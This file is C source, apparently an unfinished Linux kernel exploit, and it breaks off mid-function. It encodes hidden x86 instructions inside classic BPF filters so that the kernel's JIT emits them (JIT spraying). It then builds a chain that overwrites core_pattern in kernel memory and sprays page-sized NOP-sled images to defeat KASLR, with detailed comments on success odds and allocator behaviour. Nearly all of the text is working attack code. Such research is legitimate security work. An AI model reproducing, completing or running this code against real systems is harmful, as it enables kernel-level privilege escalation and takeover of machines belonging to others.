#include "rip.h"

#include <linux/bpf_common.h>
#include <linux/filter.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

#define ASSERT(x)  ({ bool __res = (x); if (!__res) { fprintf(stderr, "assertion failure: %s\n", #x); abort(); }; __res; })

//
// Parameters
//
// environment restrictions
#define MAX_NUM_INSNS 0x1000
#define OPTMEM_MAX 0x5000

// What is the return address from where we are being called?
static __u64 return_addr = 0xA0ffffff81000000;
// Where do we write the payload? &core_pattern
static __u64 target_addr = 0xB0ffffff83000000 - PAYLOAD_OFFSET;

// Environment settings. For the spray to succeed we need proper alignment.
// How many bytes are allocated by the module allocator?
static unsigned long module_alloc_space_taken = 0;
// How many bytes are allocated in the last bpf jit pack?
static unsigned long bpf_jit_pack_space_taken = 0;

// arbitrarily chosen, needs to fit into optmem_max
#define MSB_MAX 0x44
_Static_assert(MSB_MAX < (OPTMEM_MAX >> 8), "invalid msb");

// choose some low value which is used as increment in the add/sub chain
// we do not choose 1 here because longer payloads will run into trouble
// when jumps in the beginning need to reference later jumps (where we have
// no flexibility in the current rather simple encoding algorithm)
// So choose some higher value which is not likely to interfere and hope
// for the best. Works (TM)
#define MSB_FIXUP 3

// Allocation size to assume for eBPF jit header and junk bytes that are unusable
// for us. This always gets aligned up to multiples of 64. It is a little less,
// leaving us a little bit of room for approximation errors.
#define HEADER_LEN 64

// Set this if you are debugging on nokaslr kernels
// #define NOKASLR_DEBUG

// Set this if return thunks are enabled
#define X86_FEATURE_RETHUNK

static void parse_opts(int argc, char** argv) {
	int opt;
	bool has_return_addr = false;
	bool has_target_addr = false;

	while ((opt = getopt(argc, argv, "r:t:m:p:")) != -1) {
		switch (opt) {
		case 'r':
			return_addr = strtoul(optarg, NULL, 16);
			has_return_addr = true;
			break;
		case 't':
			target_addr = strtoul(optarg, NULL, 16) - PAYLOAD_OFFSET;
			has_target_addr = true;
			break;
		case 'm':
			module_alloc_space_taken = strtoul(optarg, NULL, 16);
			break;
		case 'p':
			bpf_jit_pack_space_taken = strtoul(optarg, NULL, 16);
			break;
		default:
		usage:
			fprintf(stderr, "usage: %s -r <return address> -t <target address> [-m <module alloced space>] [-p <jit pack allocated space>]\n", argv[0]);
			exit(1);
		}
	}

	if (!has_return_addr || !has_target_addr)
		goto usage;

	ASSERT((return_addr & 0xFFFFFFFF00000000) == (target_addr & 0xFFFFFFFF00000000) && "we write only 4 bytes");
}

//
//
//

typedef __u8 u8;
typedef __u16 u16;
typedef __u32 u32;
typedef __u64 u64;

#define LEN(x) (sizeof(x) / sizeof(x[0]))

#define MAX(a, b) ((a) > (b) ? (a) : (b))
#define MIN(a, b) ((a) < (b) ? (a) : (b))

// 2-byte instruction. Mostly used as no-op padding to fix alignment
#define __add_al(x) (0x04 | (((x) & 0xFF) << 8))
//
#define mov_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0xb8)
#define xor_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0x35)
#define add_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0x05)
#define sub_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0x2d)

//	or r8d, dword ptr [rax]	44 0b 00
#define or_r8d_RAX() (0x000b44)
//	add r8d, dword ptr [rax]	44 03 00
#define add_r8d_RAX() (0x000344)
//	add dword ptr [rax], r8d	44 01 00
#define add_RAX_r8d() (0x000144)

#define push_rsp() (0x54 | (__add_al(0) << 8))
#define push_rbp() (0x55 | (__add_al(0) << 8))
#define push_rax() (0x50 | (__add_al(0) << 8))
#define push_rdx() (0x52 | (__add_al(0) << 8))
#define pop_rbp() (0x5d | (__add_al(0) << 8))
#define pop_rax() (0x58 | (__add_al(0) << 8))
#define pop_rdx() (0x5a | (__add_al(0) << 8))

// will terminate the chain
#define __fnsave_RAX() (0x30dd)

//	add [rbp], eax
#define add_RBP_eax() (0x4501)
//	sub [rbp], eax
#define sub_RBP_eax() (0x4529)

#define ret() (0xc3)


static unsigned mov_byte_into_eax(u32* offsets, unsigned i, u8 byte) {
	offsets[i++] = mov_eax_0xe90000XX(MSB_MAX);
	u32 eax = 0xe9000000 | MSB_MAX;
	do {
		u8 lsb = (u8)(eax & 0xFF);
		if (eax > 0xFF /*MSB fixup required*/) {
			u8 rest = lsb ^ byte;
			if (rest <= MSB_MAX) {
				// try to do short XOR encoding if possible
				offsets[i++] = xor_eax_0xe90000XX(rest);
				eax ^= 0xe9000000 | rest;
			} else  if (lsb > byte) {
				u8 diff = lsb - byte;
				ASSERT(diff <= MSB_MAX);

				offsets[i++] = sub_eax_0xe90000XX(diff);
				eax -= 0xe9000000 | (u32)diff;
			} else {
				offsets[i++] = sub_eax_0xe90000XX(MSB_FIXUP);
				eax -= 0xe9000000 | MSB_FIXUP;
			}
		} else {
			if (lsb < byte) {
				u8 diff = (byte - lsb) + MSB_FIXUP /*reserve for MSB fixup*/;
				if (diff > MSB_MAX)
					diff = MSB_MAX;

				offsets[i++] = add_eax_0xe90000XX(diff);
				eax += 0xe9000000 | (u32)diff;
			} else {
				offsets[i++] = add_eax_0xe90000XX(MSB_FIXUP);
				eax += 0xe9000000 | MSB_FIXUP;
			}

		}

		ASSERT(i <= MAX_NUM_INSNS);
	} while (eax != (u32)byte);

	return i;
}

#define INSN_START 0x20
#define INSN_CONT 0x40
#define INSN_OFF 0x80

// Instructions we use for padding. They need to fullfill the following properties:
// - low number of BPF instructions
// - high number of x86 instructions
// - have a stable length under sysctl.net.core.bpf_jit_harden=1
//
// Rationale: Filter sizes are checked against optmem_max and this is estimated
// based on number of _BPF_ instructions. So in order to squeeze the maximum number
// of padding out of instructions we want to have single BPF instructions that
// generate a lot more bytes than the estimate.
enum insn {
	/* sorted by effective size */
	NEG, /* size = 2 */
	__INSN_MIN = NEG,

	SHL, /* size = 3 */
	STX, /* size = 4 */

	DIV, /* size = 20, three instructions */
	MOD, /* size = 22, three instructions */

	/* special instruction, requires extra care to be able to encode it but
	   provides best effective size by far */
	JEQ, /* size = 9 */

	__INSN_MAX = JEQ,

	// additional special instructions not used for encoding
	JMP,
	RET,

#ifdef X86_FEATURE_RETHUNK
	// Sigh. On X86_FEATURE_RETHUNK ret sizes are not stable ..
	FIRST_RET,
#else
	FIRST_RET = RET,
#endif

	__INSN_LEN,
	INVALID,
};

#ifdef X86_FEATURE_RETHUNK
#define RET_THUNK_ADD_SIZE 4
#else
#define RET_THUNK_ADD_SIZE 0
#endif

static const unsigned insn_lengths[__INSN_LEN] = {
	[NEG] = 2,
	[SHL] = 3,
	[STX] = 4,

	[JEQ] = 9,

	/* A note on div/mod: They get re-written into three instructions because of
	   constant blinding. opt-mem charges a flat 8 bytes per instruction, thus they
	   are sadly only slightly better than the smaller instructions */
	[DIV] = 20,
	[MOD] = 22,

	[JMP] = 5,
	[RET] = 5, /* assuming LD_IND was not used, both for back
	              jumps and the epilogue generated first */
#ifdef X86_FEATURE_RETHUNK
	[FIRST_RET] = 5 + RET_THUNK_ADD_SIZE /*offset of jump to thunk*/,
#endif
};


static unsigned __total_size(struct sock_filter* filter, unsigned len) {
	unsigned size = 0;
	bool seen_ret = false;

	for (unsigned i = 0; i < len; i++) {
		switch (filter[i].code) {
		case BPF_ALU | BPF_NEG:
			size += insn_lengths[NEG];
			break;
		case BPF_ALU | BPF_LSH | BPF_K:
			size += insn_lengths[SHL];
			break;
		case BPF_STX:
			size += insn_lengths[STX];
			break;
		case BPF_JMP | BPF_JEQ | BPF_X:
			size += insn_lengths[JEQ];
			break;
		case BPF_ALU | BPF_DIV | BPF_K:
			size += insn_lengths[DIV];
			break;
		case BPF_ALU | BPF_MOD | BPF_K:
			size += insn_lengths[MOD];
			break;
		case BPF_RET | BPF_A:
			seen_ret = true;
			size += insn_lengths[RET];
			break;
		case BPF_JMP | BPF_JA:
			// this is not entirely correct, but we do not use the short jumps often
			size += insn_lengths[JMP];
			break;
		case BPF_ALU | BPF_RSH | BPF_K:
			size += 2;
			break;
		default:
			fprintf(stderr, "[warning] size calculation: unknown instruction 0x%x. assuming size = 4\n", filter[i].code);
			size += 4;
			break;
		}
	}

	if (seen_ret)
		size += RET_THUNK_ADD_SIZE;

	return size;
}


struct map_entry {
	u8 flags;
	u8 insn;
	union {
		u16 i;  	// bpf instruction index if this is not a jump
		u16 off;	// jump offset if this is a jump instruction
	};
} __attribute__((__packed__));

// Find a sequence of BPF instructions that will be of the given length
static bool find_minimal_encoding(struct map_entry* seq, u32 length, bool allow_jeq) {
	unsigned factors[__INSN_LEN + 2] = {};

	if (length == 0)
		return true;

	// This is not entirely correct and does not always find the minimum. But it
	// is way simpler than a proper optimization so we go with it.

	u32 left = length;
	_Static_assert(JEQ == __INSN_MAX, "assuming JEQ is max");
	const int i_max = allow_jeq ? __INSN_MAX : (__INSN_MAX - 1);
	int i = i_max;

	while (left != 0 && i <= i_max) {
		const unsigned insn_len = insn_lengths[i];

		if (i < __INSN_MIN) {
			// backtrack
			while (i <= i_max) {
				i++;
				if (factors[i]) {
					factors[i] -= 1;
					left += insn_lengths[i];
					break;
				}
			}
		} else if (left >= insn_len) {
			factors[i] = left / insn_len;
			left = left % insn_len;
		} else {
			factors[i] = 0;
		}

		i--;
	}

	if (left == 0) {
		unsigned seq_i = 0;
		for (i = i_max; i >= __INSN_MIN; i--) {
			unsigned factor = factors[i];
			while (factor--) {
				ASSERT(seq[seq_i].insn == 0);
				seq[seq_i].flags |= INSN_START;
				seq[seq_i++].insn = i;

				for (unsigned n = 1; n < insn_lengths[i]; n++)
					seq[seq_i++].flags |= INSN_CONT;
			}
		}

		return true;
	} else {
		return false;
	}
}

#define PRINT_FILTER(f) printf("\t{ .k = 0x%08x, .code = 0x%04x, .jt = 0x%02x, .jf = 0x%02x },\n", (f).k, (f).code, (f).jt, (f).jf)
#define OP(CODE, K) do { \
		filter[insn_i].k = K; \
		filter[insn_i++].code = (CODE); \
		ASSERT(insn_i < *filter_len); \
	} while (0)

// Experimental overlapping encoding support
// If HOLE_PADDING_SLED == 1, we will fill additional hole bytes with a nop sled
// instead of the default minimal instruction encoding
#define HOLE_PADDING_SLED 1
struct hole_opts {
	u32 pad;

	const u32* offsets;
	u32 n_offsets;

	struct map_entry* map;
	struct map_entry* it;

	u32 seq_i;
	u32 seq_remain;
};
// Defines a desired hole to encode the given offsets into. PAD specifies
// the desired padding size before the payload.
#define HOLE_INIT(PAD, OFFSETS, N_OFFSETS) { \
		.pad = (PAD), \
		.offsets = (OFFSETS), \
		.n_offsets = (N_OFFSETS), \
		.map = NULL, \
		.it = NULL, \
	}

struct map_entry* __encode_build_map(const u32* offsets, u32 n_offsets, u32* last) {
	struct map_entry* map = calloc(OPTMEM_MAX, sizeof(struct map_entry));
	ASSERT(map != NULL);

	*last = 0;
	for (unsigned i = 0; i < n_offsets; i++) {
		unsigned off = offsets[i];

		const unsigned len = insn_lengths[JMP];

		// need this to ensure proper encoding into a long jump
		ASSERT(off > 123 + len);

		struct map_entry* e = &map[i * len];
		e->flags |= INSN_START;
		e->insn = JMP;
		e->off = off + len;
		for (unsigned n = 1; n < len; n++)
			e[n].flags |= INSN_CONT;

		*last = i * len + len;

		// offset is relative to following instruction
		fprintf(stderr, "jmp %u at %04x with offset %04x jumps to %04x\n", i, i * len, off, i * len + off + len);
		ASSERT(i * len + off + len < OPTMEM_MAX);
		e[off + len].flags |= INSN_OFF;
	}

	return map;
}

struct map_entry* __encode_map_next_seq(struct map_entry* map, u32* i, u32* seq_len) {
	*seq_len = 0;

	for (; *i < OPTMEM_MAX; (*i)++) {
		if (map[*i].flags & INSN_OFF) {
			int bj = *i - 1;
			for (; bj >= 0; bj--) {
				if (map[bj].flags & (INSN_CONT | INSN_START))
					break;
			}
			bj++;

			*seq_len = (*i)++ - (unsigned)bj;
			return &map[bj];
		}
	}

	return NULL;
}

static u32 __encode_into_hole(struct map_entry* seq, u32 length, struct hole_opts* opts, bool can_encode_je) {
	if (!opts->map) {
		// check if desired padding fits into hole
		u32 pad = opts->pad + opts->n_offsets * insn_lengths[JMP];
		if (pad >= length + 2)
			return length;

		fprintf(stderr, "encoding into hole of size %u with at least %u bytes for padding + jumps\n", length, pad);

		u32 last;
		struct map_entry* map = __encode_build_map(opts->offsets, opts->n_offsets, &last);

		// offset the map for maximum padding
		u32 i = 0;
		u32 seq_len = 0;
		u32 total_seq_len = 0;
		struct map_entry* it = __encode_map_next_seq(map, &i, &seq_len);
		while (it) {
			if (pad + seq_len <= length)
				total_seq_len = seq_len;
			else
				break;

			// note that because we do not fixup the instructions this
			// will always report the full sequence length
			it = __encode_map_next_seq(map, &i, &seq_len);
		}


		// encode whatever will not be filled by us
		u32 rest = length - opts->n_offsets * insn_lengths[JMP] - total_seq_len;
		fprintf(stderr, "filling padding of %u bytes\n", rest);

		// now either do this in the shortest way possible or fill with sled
		#if HOLE_PADDING_SLED
		const unsigned neg = insn_lengths[NEG];
		unsigned i_pad = 0;
		if (rest % neg != 0) {
			const unsigned shl = insn_lengths[SHL];
			_Static_assert(neg % 2 != shl % 2, "need odd instruction length");
			if (rest < shl)
				return false;

			seq[i_pad].flags |= INSN_START;
			seq[i_pad].insn = SHL;
			for (unsigned n = 1; n < shl; n++)
				seq[i_pad + n].flags |= INSN_CONT;

			i_pad += shl;
		}

		if ((rest - i_pad) % neg)
			return false;

		while (i_pad < rest) {
			seq[i_pad].flags |= INSN_START;
			seq[i_pad].insn = NEG;
			for (unsigned n = 1; n < neg; n++)
				seq[i_pad + n].flags |= INSN_CONT;

			i_pad += neg;
		}
		#else
		if (!find_minimal_encoding(seq, rest, can_encode_je)) {
			free(map);
			return length;
		}
		#endif

		seq += rest;
		length -= rest;

		// now encode all the jumps
		memcpy(seq, map, opts->n_offsets * insn_lengths[JMP] * sizeof(*map));
		seq += opts->n_offsets * insn_lengths[JMP];
		length -= opts->n_offsets * insn_lengths[JMP];

		// now we can start with the rest
		opts->map = map;
		opts->seq_i = 0;
		opts->seq_remain = 0;
		opts->it = __encode_map_next_seq(opts->map, &opts->seq_i, &opts->seq_remain);
		if (opts->it) {
			// set this dummy encoding on the last instruction to allow iteration to continue
			for (unsigned i = 0; i < opts->seq_remain; i++) {
				opts->it[i].flags |= INSN_CONT;
			}
		}
	}

	while (length > 0 && opts->seq_remain > 0) {
		u32 seq_len = MIN(opts->seq_remain, length);
		fprintf(stderr, "encoding %u/%u bytes into hole (length = %u)\n", seq_len, opts->seq_remain, length);
		ASSERT(find_minimal_encoding(seq, seq_len, can_encode_je));

		seq += seq_len;
		length -= seq_len;
		opts->seq_remain -= seq_len;

		if (opts->seq_remain == 0) {
			opts->it = __encode_map_next_seq(opts->map, &opts->seq_i, &opts->seq_remain);
			if (opts->it) {
				// set this dummy encoding on the last instruction to allow iteration to continue
				for (unsigned i = 0; i < opts->seq_remain; i++) {
					opts->it[i].flags |= INSN_CONT;
				}
			}
		}
	}

	ASSERT(opts->it == NULL || length == 0);
	return length;
}

static unsigned __encode_translate_map(struct map_entry* map, unsigned map_len, struct sock_filter* filter, unsigned* filter_len, unsigned insn_i) {
	unsigned errors = 0;
	unsigned n_insn = 0;
	for (unsigned j = 0; j < map_len; j++) {
		if (map[j].flags & INSN_START) {
			unsigned i = n_insn++;

			if (map[j].insn != JMP)
				map[j].i = i;
		}

		if (map[j].flags & INSN_OFF) {
			if (!(map[j].flags & INSN_START)) {
				fprintf(stderr, "failed to encode offset %u\n", j);
				errors++;
			}
		}

		if ((map[j].flags & INSN_START) && (map[j].flags & INSN_CONT)) {
			fprintf(stderr, "overlapping instructions at %u\n", j);
			errors++;
		}
	}

	fprintf(stderr, "n_insn = %u\n", n_insn);
	fprintf(stderr, "errors = %u\n", errors);
	ASSERT(!errors);

	unsigned n_insn_unaccounted = 0;

	// encode all the other instructions
	unsigned i_insn_inner = 0;
	for (unsigned j = 0; j < map_len; j++) {
		if (!(map[j].flags & INSN_START))
			continue;

		switch (map[j].insn) {
		case NEG:
			OP(BPF_ALU | BPF_NEG, 0);
			break;
		case SHL:
			// need k > 1 to get the 3 byte instruction
			OP(BPF_ALU | BPF_LSH | BPF_K, 2);
			break;
		case STX:
			OP(BPF_STX, 0);
			break;
		case JEQ: {
			// just jump furthest possible distance
			// should be long enough because it is checked during encoding.
			u32 jt = MIN(255, n_insn - 1 - i_insn_inner - 1);
			filter[insn_i].jt = (u8)jt;
			filter[insn_i++].code = BPF_JMP | BPF_JEQ | BPF_X;
			ASSERT(insn_i < *filter_len);
			break;
		}
		case DIV:
			n_insn_unaccounted += 2;
			OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
			break;
		case MOD:
			n_insn_unaccounted += 2;
			OP(BPF_ALU | BPF_MOD | BPF_K, 0x11111111);
			break;
		case RET:
#ifdef X86_FEATURE_RETHUNK
		case FIRST_RET:
#endif
			OP(BPF_RET | BPF_A, 0);
			break;
		case JMP: {
			// need to find the correct jump offset
			struct map_entry* e = map + j + map[j].off;
			ASSERT(e->flags & INSN_START);
			ASSERT(e->insn != JMP); // otherwise e->i would not be valid

			u32 k = e->i - i_insn_inner - 1;
			OP(BPF_JMP | BPF_JA, k);
			break;
		}
		default:
			fprintf(stderr, "invalid instruction: %d\n", map[j].insn);
			break;
		}

		i_insn_inner++;
	}

	fprintf(stderr, "translate map: number of instructions = %u (+%u)\n", i_insn_inner, n_insn_unaccounted);
	return insn_i;
}

static enum insn __suitable_ret(const struct sock_filter* filter, unsigned len) {
	for (unsigned i = 0; i < len; i++) {
		if (filter[i].code == (BPF_RET | BPF_A))
			return RET;
	}

	return FIRST_RET;
}

static unsigned __encode_offsets(struct sock_filter* filter, unsigned insn_i, unsigned* filter_len, const u32* offsets, unsigned n_offsets, enum insn final, struct hole_opts* hole_opts) {
	unsigned last = 0;
	struct map_entry* map = __encode_build_map(offsets, n_offsets, &last);

	// Add a ret right after the jump instructions here. So that we do not
	// execute any of the filling instructions after we terminate the
	// chain
	map[last].flags |= INSN_START;
	ASSERT(map[last].insn == 0);
	map[last].insn = __suitable_ret(filter, insn_i);
	for (unsigned i = 1; i < insn_lengths[map[last].insn]; i++)
		map[last + i].flags |= INSN_CONT;

	unsigned max_off;
	for (max_off = OPTMEM_MAX; max_off > 0; max_off--) {
		if (map[max_off].flags & INSN_OFF)
			break;
	}

	unsigned seq_i = 0;
	unsigned seq_len = 0;
	last = 0;
	struct map_entry* it = __encode_map_next_seq(map, &seq_i, &seq_len);
	while (it) {
		last = (unsigned long)(it - map) + seq_len;
		fprintf(stderr, "encoding sequence [%04lx - %04x] (%u bytes)\n", (unsigned long)(it - map), last, seq_len);
		bool can_encode_je = (max_off - last) > 127;

		if (hole_opts)
			seq_len = __encode_into_hole(it, seq_len, hole_opts, can_encode_je);

		if (seq_len && !find_minimal_encoding(it, seq_len, can_encode_je)) {
			fprintf(stderr, "could not find instruction sequence for %u bytes\n", seq_len);
			ASSERT(false);
		}

		it = __encode_map_next_seq(map, &seq_i, &seq_len);
	}

	if (hole_opts) {
		if (hole_opts->it) {
			u32 remain = __encode_into_hole(&map[last], OPTMEM_MAX - last, hole_opts, false);
			last += OPTMEM_MAX - last - remain;
			ASSERT(!hole_opts->it);
		}

		free(hole_opts->map);
	}


	map[last].flags |= INSN_START;
	ASSERT(map[last].insn == 0);
	map[last].insn = final;

	insn_i = __encode_translate_map(map, last + 1, filter, filter_len, insn_i);
	free(map);
	return insn_i;
}

static unsigned __fill_to_size(struct sock_filter* filter, const unsigned* filter_len, unsigned insn_i, unsigned desired_size) {
	unsigned size = __total_size(filter, insn_i) + HEADER_LEN;
	ASSERT(size <= desired_size);

	// does a "good enough" approximation with minimal instructions

	// JEQ is best, but we need enough space
	unsigned fixup_start = insn_i;
	while ((desired_size - size) > 127) {
		OP(BPF_JMP | BPF_JEQ | BPF_X, 0);
		size += insn_lengths[JEQ];
	}
	const unsigned fixup_end = insn_i;

	// fill rest with MODs and RETs
	unsigned i;
	for (i = 0; i < (desired_size - size) / insn_lengths[MOD]; i++)
		OP(BPF_ALU | BPF_MOD | BPF_K, 0x11111111);
	size += i * insn_lengths[MOD];
	for (i = 0; i < MAX(1/*need at least one ret at the end*/, (desired_size - size) / insn_lengths[RET]); i++)
		OP(BPF_RET | BPF_A, 0);

	// fixup jump labels, choose furthest possible distances
	for (i = fixup_start; i < fixup_end; i++) {
		u32 jt = MIN(255, insn_i - 1 - i - 1);
		filter[i].jt = (u8)jt;
	}

	fprintf(stderr, "adding %u padding instructions to size 0x%x\n", insn_i - fixup_start, desired_size);
	return insn_i;
}

static unsigned __add_image_nop_sled(struct sock_filter* filter, unsigned insn_i, const unsigned* filter_len) {
	// add a "nop" sled so that we can reliably hit the payload
	// This generates fdiv / fsubr instructions that corrupt st(0)
	// This means we lose another 10 bytes of the main payload. This is not really
	// a problem for the core_pattern payload but needs to be considered
	// otherwise. (There should be other options for the sled)
	//
	// See bpf_jit_binary_pack_alloc():
	//
	//   hole = min_t(unsigned int, size - (proglen + sizeof(*ro_header)),
	//       BPF_PROG_CHUNK_SIZE - sizeof(*ro_header));
	//   start = get_random_u32_below(hole) & ~(alignment - 1);
	//
	// .. with hole <= 64 - 8 and alignment = 4 ==> start = 4*k for k in [0, 13]
	// with prologue of size P our chain begins at most at P + 56 + 1(unalign)
	// With instruction size = 2 for neg and 28 instructions we are guaranteed
	// to hit the correct alignment and start position.
	//
	// Choosing the guessed payload location depends on this logic. With P = 27
	// in our case, we choose offset 27 + 56 + 1 = 84 for the RIP pointer after
	// the image base.
	for (unsigned j = 0; j < 28; j++)
		OP(BPF_ALU | BPF_NEG, 0);

	return insn_i;
}

static void prepare_bpf_jit_payload(struct sock_filter* filter, unsigned* filter_len) {
	unsigned insn_i = 0;

	unsigned j = 0;
	u32 offsets[0x1000] = {};

	// always need a nop sled. Since alignment of the final image may not be so
	// accurate we will add a larger nop sled just to be sure.
	for (int i = 0; i < 50; i++)
		OP(BPF_ALU | BPF_NEG, 0);

	// First prepare the return. This variant creates an infinite loop assuming
	//  we are being called from the nop sled.
	//
	//  If this is not desired the nop sled part I needs to preserve any volatile
	//  registers that might be needed (looking at rax, rcx, rbx, rbp in particular,
	//  rcx is always clobbered and needs to be preserved first if needed)
	//  (Depending on the return gadget chosen, r13 is clobbered as well, but fixup
	//   is not so easy in that case)
	//  (If decided to do a graceful return rax can either be the pointer to the
	//   kernel memory we corrupted or any desired value in eax. In the latter case
	//   the standard bpf leave epilogue can be used, but needs setup of course)
	//

	// Coming from the nop sled we have on the stack:
	//
	// [ rip - sled length ] <== rsp
	// [ original callee   ]
	//
	// .. duplicate to keep invariant when infinite looping
	offsets[j++] = pop_rdx();
	offsets[j++] = pop_rax();
	offsets[j++] = push_rax();
	offsets[j++] = push_rdx();
	// .. swap the second copy around so that the callee is at the top
	offsets[j++] = push_rdx();
	offsets[j++] = push_rax();


	// Now create the kernel pointer where we intend to write to.
	// The return address is at the top of the stack now
	for (u8 byte = 0; byte < sizeof(u32); byte++) {
		u8 t = (target_addr >> (byte * 8)) & 0xFF;
		u8 r = (return_addr >> (byte * 8)) & 0xFF;

		u8 off = t > r ? t - r : r - t;
		if (off == 0)
			continue;

		// get a stack pointer
		offsets[j++] = push_rsp();

		if (byte > 0) {
			// get a pointer to the stack pointer into rbp
			offsets[j++] = push_rsp();
			offsets[j++] = pop_rbp();

			// encode the byte offset. We know this will always work
			offsets[j++] = mov_eax_0xe90000XX(0x10);
			offsets[j++] = xor_eax_0xe90000XX(byte ^ 0x10);

			// increment stack pointer
			offsets[j++] = add_RBP_eax();
		}

		// load pointer into rbp. This points to the memory we want to modify
		offsets[j++] = pop_rbp();

		j = mov_byte_into_eax(offsets, j, off);

		// apply the offset
		if (t > r)
			offsets[j++] = add_RBP_eax();
		else
			offsets[j++] = sub_RBP_eax();
	}

	// get the correct address into rax
	offsets[j++] = pop_rax();

	// Now prepare for exit
	//
	// BPF function epilogue looks like this:
	//   pop r13
	//   pop rbx
	//   leave
	//   ret
	//
	// At the top of the stack is the return address now, so we can simply create
	// a frame here (we would corrupt rbx and r13 but that is fine for the loop)
	offsets[j++] = push_rbp();
	offsets[j++] = push_rsp();
	offsets[j++] = pop_rbp();

	// Finally, write the payload. This terminates our chain and we continue
	// with the normal bpf instructions afterwards
	// Note that this injects another instruction:
	//     add byte ptr [rax], al
	// Since rax is a valid pointer this does not matter. But we corrupt some of
	// the written payload. (Which is not a problem though because we skipped the
	// initial bytes anyway)
	offsets[j++] = __fnsave_RAX();

	insn_i = __encode_offsets(filter, insn_i, filter_len, offsets, j, RET, NULL);

	fprintf(stderr, "[payload] num insn = %d\n", insn_i);
	*filter_len = insn_i;
}

static void prepare_bpf_jit_nop_sled(struct sock_filter* filter, unsigned* filter_len) {
	unsigned insn_i = 0;

	unsigned j = 0;
	u32 offsets[0x1000] = {};
	u32 offsets2[0x100] = {};

	// Bypassing KASLR:
	// in arch/x86/kernel/module.c:
	// Offset is in [1, 1024] * 0x1000 = [0x1000, 0x400'000]
	//
	// Bpf jit images are allocated from the "pack allocator" (basically another
	// simple layer on top of module_alloc).
	// One pack is of size 2MB = 0x200'000 (assuming 1 numa node)
	//
	// The module_alloc allocator is rather simple (backed by vmalloc), returning
	// contiguous memory pages. One slight issue is that it emits guard pages
	// after each (pack) allocation.
	//
	// We need to fill two packs to exhaust the entire range.
	// Thus we will generate two valid chain payloads, all fitting into one pack.
	// This avoids the guard page problem, but slightly decreases our success chances
	// (assuming we have full control each pack, which can be achieved by exhausting
	// the previous "dirty" pack until it is empty):
	// One pack = 512 * 0x1000, we need 4.5 pages for the final payload image +
	// 1.5 pages for the final nop sled image and can fill the remaining
	// 512-6 = 506 pages with the nop sled image.
	// Our initial image needs at least 8 pages of padding _before_ the final
	// sled image thus we need to hit any of the prior 497 images.
	// With two images we get 497*2 / (1024 + 2 /*guard pages*/) ~ 97% success chance.
	//
	// To visualize, each <> of size 512 pages (1 pack), G representing a guard page:
	// :[random offset]<   pad   >|< slide 1 >G|< slide 2 >|< ...   >G
	// ^                                               ^
	// |                                               |
	// base address                                    last possible page that works
	//                                                 assuming random offset = 1,
	//                                                 this is our gadget address
	//
	// General idea:
	// - Generate 1-page sized images which form a "page level nop sled"
	//
	// To start it off, call 8 pages ahead with a chain like this (part I):
	// neg eax    		f7 d8
	// shr $1,%eax		d1 e8
	// jmp (0x80-S)		e9 80 00 00 00
	//
	// which gets interpreted as
	// ..
	// d8 d1         		fcom st(1)
	// e8 e9 80 00 00		call +0x80ee
	//
	// Now we have a 8-page + 0xee hole after which we can transplant a 1page jump chain
	// with rets, something like this (part III):
	//
	// add dword [rsp], 0x1000
	// pop scratch
	// push scratch
	// push scratch
	// ret
	//
	// Now this is actually not _that_ simple. Because of the random offset the kernel
	// adds to each image we cannot simply trust the return address of the injected
	// call when doing page-increments.
	// To overcome this, we add another intermediate payload which adds a small-ish
	// offset to this return address once (part II). After that we continue with the
	// ret sled outlined above.
	//
	// To visualize, we try to achieve the following:
	//
	// [ IMAGE 0x0000 ] (size = 0x1000)
	//   0  : call IMAGE +0x8000 + A
	//   ..
	//   A  : add B to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//   ...
	//   A+B: add 0x1000 to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	// [ IMAGE 0x1000 ] (size = 0x1000)
	//   0  : call IMAGE +0x8000 + A
	//   ..
	//   A  : add B to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//   ...
	//   A+B: add 0x1000 to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//
	// ...
	//
	// [ IMAGE 0x8000 ] (size = 0x1000)
	//   0  : call IMAGE +0x8000 + A
	//   ..
	//   A  : add B to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//   ...
	//   A+B: add 0x1000 to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//
	// ...
	//
	// Now suppose our initial guess hits IMAGE 0x0000. This will call into payload
	// part II or IMAGE 0x8000. At this point the return address is basically
	// IMAGE 0x0000 + 0. Now the second payload will adjust this return address
	// to IMAGE 0x0000 + B. Then we _return_ and hit part III of the previous
	// IMAGE 0x0000 + A+B, which then continues to slide through IMAGE 0x?000 + A+B
	//
	// (actually part II will already add one page to the payload but you get the
	// idea)
	//
	// Because of the random offsets at the start of each image, 0, A, A+B are all
	// padded with nop slides themselves.
	//

	// part I: Call into the "page nop sled" to get a instruction pointer on the stack

	// add nop sled
	insn_i = __add_image_nop_sled(filter, insn_i, filter_len);

	// .. ends with
	// neg eax    		f7 d8

	// shr $1,%eax		d1 e8
	OP(BPF_ALU | BPF_RSH | BPF_K, 1);

	// jmp (0x80-5)		e9 80 00 00 00
	unsigned jmp_i = insn_i;
	OP(BPF_JMP | BPF_JA, 0);

	// encode the offset of 0x80
	// 6 * DIV + 2 * STX
	_Static_assert(6 * insn_lengths[DIV] + 2 * insn_lengths[STX] == 0x80, "invalid offset");
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_STX, 0);
	OP(BPF_STX, 0);
	filter[jmp_i].k = insn_i - jmp_i - 1;

	// Fix alignment of call
	_Static_assert(insn_lengths[SHL] == 3, "invalid offset");
	OP(BPF_ALU | BPF_LSH | BPF_K, 2);

	// Fill up with nops. This is the hole that the call above jumps over in
	// addition to the 8 pages (this is placed here for the image that is hit
	// by the call)
